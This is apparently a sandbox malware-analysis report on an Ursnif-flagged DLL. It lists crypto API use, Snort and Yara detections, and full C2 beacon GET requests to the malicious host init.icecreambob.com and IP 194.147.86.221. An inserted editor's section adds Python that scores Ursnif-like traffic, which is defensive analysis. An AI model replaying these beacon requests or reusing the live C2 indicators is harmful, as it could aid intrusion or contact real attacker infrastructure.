Source: http://init.icecreambob.com/kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT | Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF | Avira URL Cloud: Label: malware
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00F33FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_00F33FAB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_032E3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_032E3FAB
Source: 2u2mgtylJy.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: 2u2mgtylJy.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ntdll.pdb | source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP | source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb | source: 2u2mgtylJy.dll

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49759 -> 194.147.86.221:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49759 -> 194.147.86.221:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49760 -> 194.147.86.221:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49762 -> 194.147.86.221:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49763 -> 194.147.86.221:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49763 -> 194.147.86.221:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49764 -> 194.147.86.221:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49764 -> 194.147.86.221:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49765 -> 194.147.86.221:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: init.icecreambob.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 194.147.86.221 80
Source: Joe Sandbox View | ASN Name: NETRACK-ASRU
Source: global traffic | HTTP traffic detected: GET /c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: init.icecreambob.com
Source: global traffic | HTTP traffic detected: GET /uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: init.icecreambob.com
Source: global traffic | HTTP traffic detected: GET /6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: init.icecreambob.com
Source: global traffic | HTTP traffic detected: GET /mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: init.icecreambob.com
Source: global traffic | HTTP traffic detected: GET /sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: init.icecreambob.com
Source: global traffic | HTTP traffic detected: GET /kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: init.icecreambob.com
Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000010.00000003.470111978.00000225DF294000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: unknown | DNS traffic detected: queries for: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
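The six requests above share one shape: a GET with no query string, a deep path of random-looking segments, `_2B` and `_2F` tokens (the percent-escapes of `+` and `/` with `%` swapped for `_`), a Firefox User-Agent without the Accept headers a real Firefox sends, and the Cache-Control/Pragma no-cache pair, all to init.icecreambob.com. Removing the slashes and undoing the two substitutions yields a string in the base64 alphabet, which is how this editor reads the path: one encoded blob split into segments (in several of the requests the token straddles a segment boundary, as `_/2B` or `_/2F`). The Python below is an added example by this editor, not part of the report or of the sample: it parses a request head and scores those traits so the structural pattern can be matched on hosts other than the one in this report, for which the Host header alone is the reliable indicator. The benign request, the score weights and the threshold are the editor's assumptions.

```python
from __future__ import annotations

import base64
import re

# Request head copied from the report's first GET to init.icecreambob.com
# (the report runs the headers together on one line; wire format restored here).
URSNIF_REQUEST = """GET /c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
Host: init.icecreambob.com
"""

# Constructed benign request for contrast (not from the report).
BENIGN_REQUEST = """GET /static/js/app.min.js?v=3 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
Host: cdn.example.com
"""

THRESHOLD = 5  # editor's assumption; tune against real traffic
_B64_ALPHABET = re.compile(r"[A-Za-z0-9+/]+")


def parse_request(raw: str) -> tuple[str, dict[str, str]]:
    """Split a request head into (request-target, lower-cased header map)."""
    lines = raw.strip().splitlines()
    _method, target, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return target, headers


def normalize_path(path: str) -> str:
    """Drop the segment separators, then undo the _2B/_2F substitution.
    Slashes must go first: the token can straddle a segment boundary
    (the report's third request contains '..._/2BGw...')."""
    joined = path.strip("/").replace("/", "")
    return joined.replace("_2B", "+").replace("_2F", "/")


def decode_payload(path: str) -> bytes | None:
    """Base64-decode the normalized path. The result is still ciphertext:
    the report shows no key, so only the opaque blob is recovered."""
    norm = normalize_path(path)
    try:
        return base64.b64decode(norm + "=" * (-len(norm) % 4), validate=True)
    except ValueError:
        return None


def score_request(raw: str) -> tuple[int, list[str]]:
    """Score the structural traits seen in the report's requests."""
    target, headers = parse_request(raw)
    path, _, query = target.partition("?")
    segments = [s for s in path.split("/") if s]
    score, reasons = 0, []

    if len(segments) >= 6:
        score += 2
        reasons.append(f"deep path: {len(segments)} segments")
    if segments and not query and "." not in segments[-1]:
        score += 1
        reasons.append("no query string and no file extension")
    norm = normalize_path(path)
    if ("+" in norm or "/" in norm) and _B64_ALPHABET.fullmatch(norm):
        score += 3
        reasons.append("one base64 blob split into segments, + and / escaped as _2B/_2F")
    if headers.get("cache-control") == "no-cache" and headers.get("pragma") == "no-cache":
        score += 1
        reasons.append("Cache-Control/Pragma no-cache pair")
    if "Firefox/" in headers.get("user-agent", "") and "accept" not in headers:
        score += 1
        reasons.append("claims Firefox but sends no Accept header")
    return score, reasons


def is_ursnif_like(raw: str) -> bool:
    return score_request(raw)[0] >= THRESHOLD


if __name__ == "__main__":
    for name, req in (("report request", URSNIF_REQUEST), ("constructed benign", BENIGN_REQUEST)):
        score, reasons = score_request(req)
        print(f"{name}: score={score} flagged={score >= THRESHOLD}")
        for reason in reasons:
            print("  -", reason)
```

`decode_payload` stops at the opaque blob because the report supplies no key. A CDN with long hashed paths can reach a score of 3 (deep path plus no extension), which is why the threshold sits above it; the `_2B`/`_2F` tokens and the missing Accept header are what separate this traffic from such false positives.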

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: Yara match; File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
                      Source: Yara match; File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
